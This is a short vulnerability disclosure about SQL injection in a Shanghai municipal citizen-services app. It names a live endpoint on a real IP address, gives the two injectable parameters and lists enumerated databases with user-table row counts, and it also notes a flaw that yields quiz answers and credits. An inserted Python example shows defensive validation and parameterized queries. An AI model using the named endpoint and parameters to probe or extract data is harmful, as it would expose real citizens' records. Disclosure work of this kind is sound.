Shanghai citizen cloud app SQL Injection
SQL Injection at a certain place in the Shanghai citizen cloud APP.
Opening the app and capturing its traffic reveals the following link:
http://218.78.214.24:8080/live/service/top/hasNewOrgan?code=310112110&username=eshimin34188390
Both the code and username parameters are injectable.
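As an added illustration of the defender's side (not code from the original report or from the app's vendor): the two query parameters are validated against the forms the report shows and then passed to the database only through placeholders. The layout of the `organ` and `society_user` tables, the username format and the in-memory SQLite stand-in are all assumptions; the report gives only the URL, the two parameter names and the table names.

```python
import re
import sqlite3
from urllib.parse import urlparse, parse_qs

CODE_RE = re.compile(r"^\d{6,12}$")               # report shows code=310112110
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")  # assumed allowed username form


def parse_params(url):
    """Return (code, username) from a hasNewOrgan URL, or raise ValueError."""
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    code = qs.get("code", [""])[0]
    username = qs.get("username", [""])[0]
    if not CODE_RE.fullmatch(code):
        raise ValueError("code must be numeric")
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains disallowed characters")
    return code, username


def build_db():
    """Constructed in-memory stand-in for the `live` database (columns assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE organ (code TEXT, name TEXT, has_new INTEGER)")
    db.execute("CREATE TABLE society_user (username TEXT, code TEXT)")
    db.executemany("INSERT INTO organ VALUES (?, ?, ?)",
                   [("310112110", "organ A", 1), ("310112111", "organ B", 0)])
    db.executemany("INSERT INTO society_user VALUES (?, ?)",
                   [("eshimin34188390", "310112110")])
    return db


def has_new_organ(db, url):
    """Hardened lookup: validate first, then bind values with placeholders."""
    code, username = parse_params(url)  # reject bad input before touching the DB
    row = db.execute(
        "SELECT o.has_new FROM organ o "
        "JOIN society_user u ON u.code = o.code "
        "WHERE o.code = ? AND u.username = ?",  # never string concatenation
        (code, username),
    ).fetchone()
    return bool(row and row[0])
```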
Database: live
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| society_user     | 42489   |
| commercial       | 6012    |
| notice           | 2216    |
| temp_com         | 1620    |
| services_discuss | 437     |
| organ            | 214     |
| society          | 214     |
| dic_service      | 31      |
+------------------+---------+

Database: live_online
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| organ_type_remind   | 1139597 |
| organ_masg_remind   | 414863  |
| society_user        | 133187  |
| affairsorganelation | 39777   |
| notice              | 12991   |
| commercial          | 7438    |
| favorite            | 3027    |
| temp_com            | 1620    |
| affairsarchives     | 1273    |
| services_discuss    | 850     |
| affairsorder        | 511     |
| affairsdefine       | 280     |
| society             | 252     |
| organ               | 217     |
| enumeration         | 88      |
| recommend_service   | 75      |
| commercial_set_top  | 42      |
| dic_service         | 39      |
| geo                 | 19      |
| vacation            | 12      |
| subject             | 9       |
| affair_type         | 8       |
| recommend_affair    | 7       |
+---------------------+---------+

Database: live_offline
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| society_user        | 42397   |
| affairsorganelation | 41211   |
| commercial          | 6011    |
| notice              | 1901    |
| temp_com            | 1620    |
| affairsarchives     | 1189    |
| services_discuss    | 438     |
| favorite            | 411     |
| affairsdefine       | 259     |
| society             | 249     |
| organ               | 217     |
| enumeration         | 86      |
| dic_service         | 31      |
| geo                 | 19      |
| affairsorder        | 16      |
| affair_type         | 8       |
| recommend_affair    | 4       |
| subject             | 4       |
+---------------------+---------+

There is also another design defect: clicking here lets you obtain quiz questions and credits.
There was a past promotion in which 10 points could be spent on a lucky draw.